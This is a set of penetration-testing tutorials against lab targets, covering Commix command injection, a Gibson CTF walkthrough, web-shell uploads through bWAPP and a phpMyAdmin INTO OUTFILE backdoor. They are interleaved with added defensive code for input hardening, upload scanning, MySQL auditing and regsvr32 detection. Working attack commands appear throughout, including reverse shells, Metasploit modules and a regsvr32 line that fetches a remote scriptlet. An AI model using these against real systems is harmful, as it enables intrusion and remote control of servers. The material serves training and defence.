
Exploit Command Injection Vulnerability with Commix and Netcat


Commix is an automated command injection tool. If a web application is vulnerable to command injection, it lets you obtain a meterpreter or netcat session through that flaw. It’s efficient and reliable, and is widely used by security experts, penetration testers and web developers to find vulnerabilities. In this article we will learn how to get a netcat session using Commix.
Requirements:

·        PentesterLab (for Linux testing)
·        Kali Linux
·        Commix
As you can see in the image below, the PentesterLab environment is vulnerable to command injection.


Capture the cookies of PentesterLab in Burp Suite as shown in the image below:


Copy the contents of the cookies into a TXT file and use the following command to attack:
commix -r /root/Desktop/1.txt
Once the exploitation succeeds, it will ask whether you want to load the pseudo terminal. Type ‘y’ and the pseudo terminal will be loaded. Use the command ‘whoami’ to check the current user, as shown in the image:


Now that you are in the pseudo terminal, type the following set of commands to generate a reverse shell:

reverse_tcp
set lhost 192.168.1107
set lport 4321

After executing the above commands, it will ask whether you want a netcat shell or another (meterpreter) shell. Choose option 1, as we will try to get a netcat session. Then choose option 1 to use the default netcat settings for the target. Then type y to use /bin as your subdirectory.


At the same time, start the netcat listener with the following command:

nc -lvp 4321

If the steps execute correctly, you will have your session as shown in the image below:


Another method to get a netcat session is to use different netcat settings. For this, repeat the above steps, but this time choose option 3 under the category of ‘unix-like targets’ for the traditional netcat settings.


Again, at the same time start the netcat listener with the following command:
nc -lvp 1234


This way, you can use Commix again and again to gain a netcat session through various methods.
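Commix automates exactly the bug class shown above: a request parameter that ends up inside a shell command. The following added example (not PentesterLab’s or Commix’s own code; function names, the regexes and the sample log lines are constructed for illustration) shows the vulnerable shape of such a "ping this host" feature beside its hardened form, and a small access-log check that flags the shell metacharacters an injection request has to carry.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed example: a "ping this host" feature, the classic shape of the
# command injection bug that Commix probes for. Nothing here is PentesterLab's
# or Commix's code; function names and sample inputs are assumptions.

# Allowlist for a hostname or IPv4 literal: letters, digits, dots and dashes,
# never starting with "-" (so the value cannot become a ping option either).
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def is_valid_host(host):
    return bool(HOST_RE.fullmatch(host))


def build_ping_vulnerable(host):
    """Vulnerable pattern: the request parameter is pasted into one string
    that a shell will parse (system(), shell=True). Returned, not executed,
    so the effect of a ';' or '|' in the input can be seen."""
    return "ping -c 1 " + host


def build_ping_hardened(host):
    """Hardened pattern: validate against the allowlist, then build an argv
    list for subprocess.run(..., shell=False); no shell ever sees the value."""
    if not is_valid_host(host):
        raise ValueError("rejected host value: %r" % host)
    return ["ping", "-c", "1", host]


# Detection side: metacharacters (and their percent-encoded forms) that a
# command injection payload needs: separators, pipes, substitution, newlines.
INJECTION_RE = re.compile(r"[;&|`$\n\r]|%0a|%0d|%3b|%7c|%26|%24|%60", re.IGNORECASE)


def suspicious_params(request_line):
    """For a request line such as 'GET /ping.php?host=x HTTP/1.1', return the
    (name, decoded value) pairs whose value carries injection characters."""
    _method, _, rest = request_line.partition(" ")
    target = rest.rsplit(" ", 1)[0] if " HTTP/" in rest else rest
    hits = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if INJECTION_RE.search(value):
            hits.append((name, value))
    return hits


# Constructed access-log lines in combined log format (not from the page).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:00:01 +0000] "GET /ping.php?host=127.0.0.1 HTTP/1.1" 200 312
203.0.113.7 - - [10/Oct/2023:10:00:02 +0000] "GET /ping.php?host=127.0.0.1%3Bid HTTP/1.1" 200 412
203.0.113.7 - - [10/Oct/2023:10:00:03 +0000] "GET /ping.php?host=127.0.0.1%7C%7Cwhoami HTTP/1.1" 200 398
203.0.113.9 - - [10/Oct/2023:10:00:04 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3})')


def flag_log(text):
    """Return (client ip, parameter, decoded value) for each request whose
    query string looks like a command injection attempt."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request, _status = m.groups()
        for name, value in suspicious_params(request):
            findings.append((ip, name, value))
    return findings


if __name__ == "__main__":
    print(build_ping_vulnerable("127.0.0.1; id"))
    print(build_ping_hardened("example.com"))
    for hit in flag_log(SAMPLE_LOG):
        print("suspicious request:", hit)
```

The fix is the argv list plus the allowlist together: the list keeps the shell out of the picture, the allowlist keeps a leading dash from turning into a ping option. The log check is deliberately loose (it fires on any separator character) because a tool like Commix sends many variants, so the volume of hits from one client over a few seconds is itself the signal.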

Hack the Gibson VM (CTF Challenge)


Hello friends!! Welcome to our next CTF challenge from VulnHub, called “Gibson”. It is a boot-to-root challenge whose ultimate goal is to get the flag and finish the task. This VM is designed to test your penetration testing skills by spawning the root shell of a weakly configured machine; the author has asked us to find the hidden flag through privilege escalation. You can download it from the link given below. I found this lab more interesting because it involves cyber forensics to get the final flag.


Penetration Methodology
§  Network Scanning (Netdiscover, Nmap)
§  Abusing HTTP service for username & password
§  Spawning Pty shell SSH (Metasploit)
§  Privilege Escalation via Kernel exploit
§  Uploading LinEnum script
§  Obtain disk image
§  Forensic analysis to extract the hidden flag.img
§  Decrypt GPG encrypted file using leet encoded value
§  Capture the Flag


Let’s start off by scanning the network to find our target’s IP.
netdiscover
Our target IP is 192.168.1.100, so now we move to enumeration and scan the target with nmap, which will show all the open ports.
nmap -p- -A 192.168.1.100
In this case only two ports are open, 22 and 80, and nmap has also found an HTML file.

Since port 80 is open, we will open the target IP in the browser.
It shows an accessible HTML page, but when we open it we cannot see any crucial information. It says the result will be found by brute force, but there is no place where we can apply brute force.


As we do not have any other option, let’s look at the page source code to see if we can find a clue to move further in our task.
Ohhh!! Great, there is something referring to a username and password; as per my prediction, god could be the password and margo the username.

From our nmap result we saw port 22 open for SSH login, so let’s try to log in over SSH using the credentials found above. For this we will take the help of the Metasploit framework: the following module gives us a session once the login succeeds.
use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.100
msf auxiliary(scanner/ssh/ssh_login) > set username margo
msf auxiliary(scanner/ssh/ssh_login) > set password god
msf auxiliary(scanner/ssh/ssh_login) > exploit
Hmm!! That’s great, we have compromised the target machine. You will love to see that the session opened by default is a command shell session, which we then upgraded to a meterpreter session. Then run the “sysinfo” command to identify the system architecture.

As it was Ubuntu 14.04 (Linux 3.19.0-25-generic), I searched Google for a kernel exploit for privilege escalation.


Luckily, I found this kernel was badly affected by Overlayfs - A Local Privilege Escalation. Superb, Metasploit has a built-in module for this exploit.
use exploit/linux/local/overlayfs_priv_esc
msf exploit(linux/local/overlayfs_priv_esc) > set session 1
msf exploit(linux/local/overlayfs_priv_esc) > set lhost 192.168.1.109
msf exploit(linux/local/overlayfs_priv_esc) > exploit

Here again you will love to see that the session opened by default is a command shell session, which we then upgraded to a meterpreter session.

sessions -u 3


Now let’s upload LinEnum, a scripted Local Linux Enumeration & Privilege Escalation Checks shell script that enumerates the system configuration and gives a high-level summary of the checks/tasks it performed.
To know more about the LinEnum script, visit the link given below:
https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/

upload /root/pentest/privs/LinEnum.sh .
chmod 777 LinEnum.sh
./LinEnum.sh


Here we get an interesting file, highlighted in the image below. It shows that some external server is running.

Now in the process list we see something like ftpserv, so we can search for files based on that name.
find / -name ftpserv*
Awesome, it gives us the “ftpserv.img” file, which could prove useful; let’s download it to our local machine with the following command.
download /var/lib/libvirt/images/ftpserv.img /root/Desktop/



So let’s check what type of file it is. The file command shows the complete details of the image file, and from this we learn that the image contains a partition boot sector, which holds the information the file system uses to access the volume.

Now let’s find the partition table of the device, along with the sizes given in sectors, with the help of the following command:
fdisk -lu ftpserv.img

Wonderful! It is a FAT16 file system, and since we have entered the forensic phase you should have a little knowledge of cyber forensics. We are going to use The Sleuth Kit, a command line forensic analysis toolkit, to list the file and directory names in this image with the following command (the -o 63 is the partition’s starting sector reported by fdisk):

fls -f fat16 -o 63 ftpserv.img

Hmmm!! Here I found something very interesting, a “garbage” folder; let’s explore it by executing the command below.
fls -f fat16 -o 63 ftpserv.img 12

Awesome!! It was good to see an image file “flag.img” along with its inode number. An inode number holds metadata, and I’m pretty sure that we will take that information from inside flag.img. Let’s extract the content at that inode from ftpserv.img into flag.img and then mount it.

icat -f fat16 -o 63 ftpserv.img 845580 > flag.img
mount flag.img /mnt
cd /mnt
ls
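The fdisk, fls and icat steps above all hinge on one number: the sector where the partition begins, which fdisk reads from the MBR and which fls/icat receive as -o 63. The following added example (not part of the write-up and not the CTF’s ftpserv.img; every value in the constructed image is an assumption) does that arithmetic by hand: it builds a tiny disk image with one FAT16 partition at sector 63, reads the partition table the way fdisk does, decodes the BIOS Parameter Block at that offset, and derives where the FAT, root directory and data area sit, which is what The Sleuth Kit has to work out before it can list or carve files.

```python
import struct

SECTOR = 512
BPB_FMT = "<HBHBHHBHHHII"   # BIOS Parameter Block, starting at byte 11 of the boot sector
PART_FMT = "<B3sB3sII"      # one 16-byte MBR partition entry


def build_sample_image():
    """Constructed disk image (not the CTF's ftpserv.img): an MBR whose first
    partition is FAT16 starting at sector 63, the geometry fdisk reports on the
    page. Every value is an assumption chosen for the demonstration."""
    mbr = bytearray(SECTOR)
    # bootable flag, CHS start (ignored), type 0x06 = FAT16, CHS end (ignored),
    # LBA start sector, sector count
    struct.pack_into(PART_FMT, mbr, 446, 0x80, b"\0\0\0", 0x06, b"\0\0\0", 63, 65472)
    mbr[510:512] = b"\x55\xaa"

    vbr = bytearray(SECTOR)            # volume boot record of the partition
    vbr[0:3] = b"\xeb\x3c\x90"         # jump instruction
    vbr[3:11] = b"MSDOS5.0"            # OEM name
    struct.pack_into(BPB_FMT, vbr, 11,
                     512,    # bytes per sector
                     4,      # sectors per cluster
                     4,      # reserved sectors (this boot sector included)
                     2,      # FAT copies
                     512,    # root directory entries
                     0,      # total sectors, 16-bit field (0: use 32-bit one)
                     0xF8,   # media descriptor (fixed disk)
                     64,     # sectors per FAT
                     63,     # sectors per track
                     255,    # heads
                     63,     # hidden sectors (distance from disk start)
                     65472)  # total sectors, 32-bit field
    vbr[54:62] = b"FAT16   "
    vbr[510:512] = b"\x55\xaa"
    # sectors 1..62 are the unused gap between the MBR and the partition
    return bytes(mbr) + bytes(62 * SECTOR) + bytes(vbr)


def parse_partitions(image):
    """Read the four MBR slots and return (type, start sector, sector count)
    for the populated ones, which is what `fdisk -lu` prints."""
    if image[510:512] != b"\x55\xaa":
        raise ValueError("no MBR signature")
    parts = []
    for slot in range(4):
        _boot, _chs0, ptype, _chs1, start, count = struct.unpack_from(PART_FMT, image, 446 + 16 * slot)
        if ptype:
            parts.append((ptype, start, count))
    return parts


def parse_fat16(image, sector_offset):
    """Decode the BPB at sector_offset (the value handed to fls/icat -o) and
    return the absolute sector numbers of the FAT, root directory and data
    area, which is the arithmetic the Sleuth Kit does before listing files."""
    base = sector_offset * SECTOR
    vbr = image[base:base + SECTOR]
    if vbr[510:512] != b"\x55\xaa":
        raise ValueError("no boot sector at sector %d" % sector_offset)
    (bps, spc, reserved, nfats, root_entries, total16, _media, spf,
     _spt, _heads, _hidden, total32) = struct.unpack_from(BPB_FMT, vbr, 11)
    total = total16 or total32
    root_sectors = (root_entries * 32 + bps - 1) // bps   # 32 bytes per entry
    fat_sector = sector_offset + reserved
    root_sector = fat_sector + nfats * spf
    data_sector = root_sector + root_sectors
    clusters = (total - reserved - nfats * spf - root_sectors) // spc
    # The cluster count, not the label in the boot sector, decides the variant.
    if clusters < 4085:
        fs_type = "FAT12"
    elif clusters < 65525:
        fs_type = "FAT16"
    else:
        fs_type = "FAT32"
    return {
        "fs_type": fs_type,
        "byte_offset": base,
        "bytes_per_sector": bps,
        "sectors_per_cluster": spc,
        "fat_sector": fat_sector,
        "root_dir_sector": root_sector,
        "data_sector": data_sector,
        "cluster_count": clusters,
    }


def cluster_to_byte(layout, cluster):
    """Byte address of a data cluster (numbering starts at 2), the step icat
    takes for every cluster in a file's chain when it carves a file out."""
    sector = layout["data_sector"] + (cluster - 2) * layout["sectors_per_cluster"]
    return sector * layout["bytes_per_sector"]


def layout_of_sample():
    image = build_sample_image()
    _ptype, start, _count = parse_partitions(image)[0]
    return parse_fat16(image, start)


if __name__ == "__main__":
    for ptype, start, count in parse_partitions(build_sample_image()):
        print("partition type 0x%02x start %d sectors %d" % (ptype, start, count))
    print(layout_of_sample())
```

Two details matter in practice: the byte offset is the sector number times the sector size (63 × 512 = 32256 here, which is why mounting the raw image needs an offset while mounting the carved flag.img does not), and the FAT12/16/32 decision comes from the cluster count, so the "FAT16" string in the boot sector is only a hint that a forensic tool must verify.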
Booom!! Here I saw the very interesting file “hint.txt”, which holds two links.

When I visited both links I found that “Jonny Lee Miller” is a character common to both, and in the movie Hackers he is called “Zero Cool”.
Then we explored more and found the hidden directory /.trash, which holds an encrypted file flag.txt.gpg, but “Zero Cool” wasn’t the correct passphrase and it took almost a whole day to decrypt it.
At last I thought from the hacker’s point of view and encoded “Zero Cool” in leet, but unfortunately I was unable to decrypt the encrypted file with Z3r0C00l.
Finally, I obtained the correct passphrase Z3r0K00l by replacing the letter C with K, and executed the following command to decrypt the GPG encryption.
gpg --passphrase Z3r0K00l flag.txt.gpg


Hurray!! We successfully decrypted the file and obtained flag.txt.

Web Shells Penetration Testing (Beginner Guide)

Through this article I would like to share file uploading using different types of web shell scripts on a web server, in order to try to get unauthorized access to the server.

Web shells are scripts coded in languages like PHP, Python, ASP, Perl and many others, which are used as a backdoor for unauthorized access to a server once uploaded to its web server.

Once the shell is uploaded to the target location, the attacker may be able to perform read and write operations directly: he will be able to edit any file or delete files from the server.

Attacker: Kali Linux
Target: Bwapp
Let’s begin!!!

B374k script

Open a terminal and type the following command to download the b374k script from GitHub.



This is a PHP shell which provides a reverse connection to the attacker’s machine, where he can execute commands to retrieve the victim’s information.


The following command will create a malicious file shell.php as the backdoor shell with password raj123.
php -f index.php -- -o shell.php -p raj123


Now let’s open the target IP in the browser: 192.168.1.103:81/bWAPP/login.php. Enter the user and password as bee and bug respectively.
Set the security level to low, choose your bug from the list box, select Unrestricted File Upload and click on Hack.


Here you can see the web server allows us to upload an image on the Unrestricted File Upload page.


Click on Browse to select shell.php and then click on Upload to send it to the web server.

Now you can read the message in the screenshot, “image has been uploaded here”, which means our PHP backdoor was uploaded successfully. Now click on the link “here”.

Here a password is required to execute shell.php; I had given raj123 as its password.


In the given screenshot you can see we are inside the images directory.


Click on the Terminal tab in the b374k menu bar, which provides the victim’s terminal to execute the desired commands. In the image you can read the command I executed.
lsb_release -a


Now I will connect to the b374k shell from netcat and try to access the victim’s shell. Open a terminal in Kali Linux and type the following netcat command.

nc 192.168.0.103 8888

Inside the b374k shell, select the Network option from the menu to open a bind connection; give the target IP 192.168.0.103 as the server IP and port 8888, then scroll down the list, select Perl and click on Run.


This will give you a reverse connection on netcat, and in the screenshot you can read the victim information I obtained by executing the following commands.
whoami
cat /etc/passwd


C99shell script
Download c99shell from the given link


C99shell is a PHP backdoor which, once uploaded, shows details of files and folders and lets you perform command execution through it.


This time again open the web server IP in the browser to upload c99shell.php.


Here you can read the message in the screenshot, “image has been uploaded here”, which means our PHP backdoor was uploaded successfully. Now click on the link “here”.



Here our malicious PHP file is executed and it dumps the names of 25 files. In the screenshot you can see all files under the images directory are jpg, png and gif images.


Now select the Bind option from the menu to connect to the host from netcat. Repeat the same process to run netcat in the background, then give host IP 192.168.0.103 and port 8888, select “using Perl” and click on Connect.


This will give you a reverse connection on netcat.


Weevely Web Shell

Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through a small-footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environments.

Open the terminal and type the following command, which will create a web shell as backdoor.php on the Desktop with password pass.

weevely generate raj123 /root/Desktop/weevely.php


Open the target location where you want to upload your backdoor. Now I browse for weevely.php and click on Upload to upload the web shell. In the screenshot you can see that weevely.php has been uploaded successfully.
Right-click on the link “here” and choose Copy Link Location.


Again, type the following command to start the attack on the web server, passing the URL copied above together with the password raj123 to the weevely command.


Now you can see that I have got the victim’s shell through Weevely. Type the following commands to retrieve the victim’s information.

whoami
cat /etc/passwd


Type help at the weevely prompt, which will show all the modules present inside it.


WSO script

Download this script from given link.


This is also a PHP script, quite similar to the c99shell.php and b374k.php shells, and it performs the same functions as the c99 script.

Again repeat the same process to upload the wso2.5.1.php script into bWAPP, then click on the link “here”.

After executing the shell, you will see it has retrieved basic information about the target and dumped the file and folder names.


All options are the same as above; now try yourself to connect this shell with netcat.
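Every shell in this guide (b374k, c99shell, weevely, WSO) got onto the server the same way: the bWAPP upload form accepted a .php file as an "image" and the web server then executed it from the images directory. The following added example (not bWAPP’s code and not any of the shells’ own code; file names, the marker lists and the sample contents are constructed assumptions) shows the three checks an upload handler should have made, and applies the same checks as a scanner over an existing upload directory so that files already planted there can be found.

```python
import tempfile
from pathlib import Path

# Constructed example, not bWAPP's or any of the shells' own code: the checks
# an upload handler should make before storing a "picture", and a scanner that
# applies the same checks to an existing images directory. File names,
# thresholds and sample contents are assumptions.

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
SCRIPT_EXT = {".php", ".php3", ".php5", ".phtml", ".phar", ".pl", ".py", ".asp", ".aspx", ".jsp"}

# Leading bytes of the formats the form claims to accept.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Byte strings that have no business inside an image and are typical of PHP
# web shells: open tags plus the calls such shells use to run commands.
SHELL_MARKERS = [
    b"<?php", b"<?=", b"<script language=\"php\"",
    b"eval(", b"system(", b"passthru(", b"shell_exec(", b"exec(",
    b"base64_decode(", b"$_GET[", b"$_POST[", b"$_REQUEST[",
]


def sniff_image(data):
    """Return the image kind from the magic bytes, or None if not an image."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename, data):
    """Decide whether an upload may be stored. Returns (ok, reason). The
    checks run in order of cost: name, then magic bytes, then content."""
    name = Path(filename).name                       # drop any path component
    suffixes = [s.lower() for s in Path(name).suffixes]
    if any(s in SCRIPT_EXT for s in suffixes):       # shell.php, shell.php.jpg
        return False, "script extension"
    if not suffixes or suffixes[-1] not in ALLOWED_EXT:
        return False, "extension not allowed"
    if sniff_image(data) is None:                    # shell.php renamed to .jpg
        return False, "content is not an image"
    if any(marker in data for marker in SHELL_MARKERS):   # image with PHP appended
        return False, "embedded PHP/web shell markers"
    return True, "ok"


def scan_upload_dir(root):
    """Apply validate_upload to every file under root; return the rejects as
    sorted (relative path, reason) pairs. Useful after the fact, because the
    upload form on the page never made these checks."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_file():
            ok, reason = validate_upload(path.name, path.read_bytes())
            if not ok:
                findings.append((str(path.relative_to(root)), reason))
    return sorted(findings)


def demo():
    """Write constructed sample files into a temporary 'images' directory and
    return what the scanner flags."""
    samples = {
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "photo.jpeg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        "shell.php": b"<?php /* constructed marker only */ ?>",
        "cat.jpg": b"<?php /* constructed marker only */ ?>",
        "poly.gif": b"GIF89a" + b"\x00" * 16 + b"<?php /* constructed marker only */ ?>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, content in samples.items():
            Path(tmp, name).write_bytes(content)
        return scan_upload_dir(tmp)


if __name__ == "__main__":
    for name, reason in demo():
        print("rejected %-10s %s" % (name, reason))
```

The content checks are a backstop, not the fix: the decisive control is that the web server must not execute scripts from the upload directory at all (for Apache with mod_php, `php_admin_flag engine off` in that directory’s configuration; for nginx, a location block that never passes the path to PHP-FPM), so that even a file the checks miss is served as bytes rather than run.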

Shell Uploading in Web Server through PhpMyAdmin

In this tutorial we will learn how to exploit a web server if we find that a phpMyAdmin panel has been left open. Here I will try to exploit phpMyAdmin running inside the localhost “xampp” by crafting a SQL query that executes malicious code, and then make an effort to access the shell of the victim’s PC.

phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc.) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.

Features
·         Intuitive web interface
·         Support for most MySQL features:
          ·   browse and drop databases, tables, views, fields and indexes
          ·   create, copy, drop, rename and alter databases, tables, fields and indexes
          ·   maintain servers, databases and tables, with proposals on server configuration
          ·   execute, edit and bookmark any SQL statement, even batch queries
          ·   manage MySQL user accounts and privileges
          ·   manage stored procedures and triggers
·         Import data from CSV and SQL
·         Export data to various formats: CSV, SQL, XML, PDF, ISO/IEC 26300 - OpenDocument Text and Spreadsheet, Word, LaTeX and others
·         Administering multiple servers
·         Creating graphics of your database layout in various formats
·         Creating complex queries using Query-by-example (QBE)
·         Searching globally in a database or a subset of it
·         Transforming stored data into any format using a set of predefined functions, like displaying BLOB data as an image or download link

For information visit: https://www.phpmyadmin.net

Let’s start!!!

Open the localhost address 192.168.1.101:81 in the browser and select the phpMyAdmin option from the XAMPP list, as shown in the following screenshot.


When you enter the phpMyAdmin application you will find different areas. On the left side of the screen you can see the list of database names. As we are inside the administration console, where we can perform the multiple tasks defined above, I am going to create a new database.
Click on New to create a database.


Give your database a name, as I have given Ignite technologies, and click on Create.


Now you can see the database ignite technologies has been added to the list of databases.


Click on the ignite technologies database to construct a MySQL query inside it, then click on the SQL tab where you can enter the SQL query code.


Now comes the interesting part, because here I am going to execute malicious code as a SQL query which will create a command shell vulnerability inside the web server.
SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php"
In the following screenshot you can see I have entered the above malicious PHP code as a SQL query and then clicked on the Go tab to execute it.

Now type the following URL to find out whether we succeeded in creating an OS command shell vulnerability.

Awesome!!! You can see it has given a warning, which means we have successfully created an OS command shell vulnerability.

When you execute the above URL in the browser you will get a listing of the victim’s PC directories.
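The SELECT ... INTO OUTFILE step only works because the MySQL server is allowed to write into the web root, which is governed by the secure_file_priv system variable (empty means "anywhere the service account can write"). The following added example (not XAMPP’s shipped configuration and not part of the original post; the paths, option values and the checker itself are constructed assumptions) shows the weak setting beside a corrected one and audits a my.ini/my.cnf [mysqld] section for it.

```python
import configparser

# Constructed my.ini fragments (not XAMPP's shipped file). The first leaves
# SELECT ... INTO OUTFILE free to write wherever the MySQL service account can,
# which is what dropping backdoor.php into htdocs relies on; the second pins
# file export to one directory outside the web root. Paths are assumptions.
WEAK_MYSQLD = """\
[mysqld]
datadir = C:/xampp/mysql/data
secure_file_priv =
"""

HARDENED_MYSQLD = """\
[mysqld]
datadir = C:/xampp/mysql/data
secure_file_priv = C:/xampp/mysql/export
local_infile = 0
"""

WEB_ROOT_HINTS = ("htdocs", "www", "public_html", "wwwroot")


def mysqld_options(text):
    """Parse the [mysqld] section of a my.cnf/my.ini into a dict. Keys are
    normalised because MySQL accepts secure-file-priv and secure_file_priv
    alike, and surrounding quotes are stripped from values."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("mysqld"):
        return {}
    opts = {}
    for key, value in cp.items("mysqld"):
        value = "" if value is None else value.strip().strip('"').strip("'")
        opts[key.lower().replace("-", "_")] = value
    return opts


def audit_mysqld(text):
    """Return (option, finding) pairs for settings that let a SQL console
    reach the file system. An empty list means nothing to report."""
    opts = mysqld_options(text)
    findings = []
    sfp = opts.get("secure_file_priv")
    if sfp is None:
        findings.append(("secure_file_priv", "not set; the build default applies, state it explicitly"))
    elif sfp == "":
        findings.append(("secure_file_priv", "empty; INTO OUTFILE may write to any server-writable path, web root included"))
    elif sfp.upper() == "NULL":
        pass  # file import/export disabled entirely
    elif any(hint in sfp.lower() for hint in WEB_ROOT_HINTS):
        findings.append(("secure_file_priv", "points inside the web root; files written there are served"))
    # LOAD DATA LOCAL is the read-side counterpart; keep it off unless needed.
    if opts.get("local_infile", "1").lower() not in ("0", "off", "false"):
        findings.append(("local_infile", "not disabled"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_MYSQLD), ("hardened", HARDENED_MYSQLD)):
        print(label, audit_mysqld(text) or "no findings")
```

The effective value can be confirmed at runtime with `SHOW VARIABLES LIKE 'secure_file_priv';`, and the second half of the fix is on the account side: the user phpMyAdmin logs in as should not hold the FILE privilege, which INTO OUTFILE requires regardless of the directory setting.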


The next step is to obtain a meterpreter session on the victim’s PC.
Open another terminal in Kali Linux and type the following commands.
msfconsole
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.104
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
Copy the selected part for the DLL file and use this malicious code as the command inside the URL.
regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll


Paste the above code into the URL and execute it, which will give a meterpreter session in Metasploit.
http://192.168.1.101:81/backdoor.php?cmd= regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll

In the following screenshot you can see meterpreter session 1 opened.


sessions -i 1
meterpreter > sysinfo
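The regsvr32 command that the Metasploit module hands out leaves two very visible traces on the victim: regsvr32.exe loading a remote scriptlet (the /i:http... argument with scrobj.dll), and, before that, the Apache process spawning cmd.exe on behalf of backdoor.php. The following added example (not Metasploit’s code and not telemetry from the page’s lab; the events, host names and the scriptlet file name are constructed placeholders) writes both observations as detection rules and runs them over Sysmon-style process-creation events.

```python
import re

# Constructed process-creation events in a Sysmon-like key=value form (not
# telemetry from the page's lab). Field names follow Sysmon Event ID 1
# (ParentImage, Image, CommandLine); hosts, paths and the scriptlet name are
# placeholders.
SAMPLE_EVENTS = r"""
ParentImage=C:\xampp\apache\bin\httpd.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c regsvr32 /s /n /u /i:http://192.0.2.10:8080/EXAMPLE.sct scrobj.dll
ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:http://192.0.2.10:8080/EXAMPLE.sct scrobj.dll
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe notes.txt
ParentImage=C:\Windows\System32\msiexec.exe|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s C:\Program Files\Vendor\lib.dll
""".strip()

WEB_SERVER_IMAGES = {"httpd.exe", "apache.exe", "nginx.exe", "w3wp.exe", "php.exe", "php-cgi.exe"}
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "regsvr32.exe", "rundll32.exe",
                   "mshta.exe", "certutil.exe", "wscript.exe", "cscript.exe"}

# regsvr32 /i:<url> together with scrobj.dll loads a remote scriptlet; the
# module on the page emits this shape, and "/u / i:" with stray spaces (as the
# page shows it) is the same thing, hence the \s* allowances.
REMOTE_SCRIPTLET_RE = re.compile(r"/\s*i:\s*https?://|scrobj\.dll", re.IGNORECASE)


def parse_event(line):
    """Split 'Key=value|Key=value' into a dict (values may contain spaces)."""
    return dict(field.split("=", 1) for field in line.split("|") if "=" in field)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the detection rule names that fire for one event, in order."""
    rules = []
    cmd = event.get("CommandLine", "")
    # Rule 1: regsvr32 pointed at a remote scriptlet (seen on the child and on
    # the cmd.exe that launched it, since both command lines carry the URL).
    if "regsvr32" in cmd.lower() and REMOTE_SCRIPTLET_RE.search(cmd):
        rules.append("regsvr32_remote_scriptlet")
    # Rule 2: a web server process spawning an interpreter or LOLBin, which is
    # what backdoor.php?cmd=... looks like from the process tree.
    if (basename(event.get("ParentImage", "")) in WEB_SERVER_IMAGES
            and basename(event.get("Image", "")) in LOLBIN_CHILDREN):
        rules.append("webserver_spawned_shell")
    return rules


def scan_events(text):
    """Return (line number, rules) for every event that matched a rule."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        rules = classify(parse_event(line))
        if rules:
            hits.append((number, rules))
    return hits


if __name__ == "__main__":
    for number, rules in scan_events(SAMPLE_EVENTS):
        print("event %d: %s" % (number, ", ".join(rules)))
```

The fourth sample event shows why the first rule keys on the remote scriptlet rather than on regsvr32 alone: installers register local DLLs with regsvr32 all day, while a /i: argument carrying a URL has no routine administrative use. The second rule is the more general one and would also catch the web shells from the earlier sections, whichever command they run.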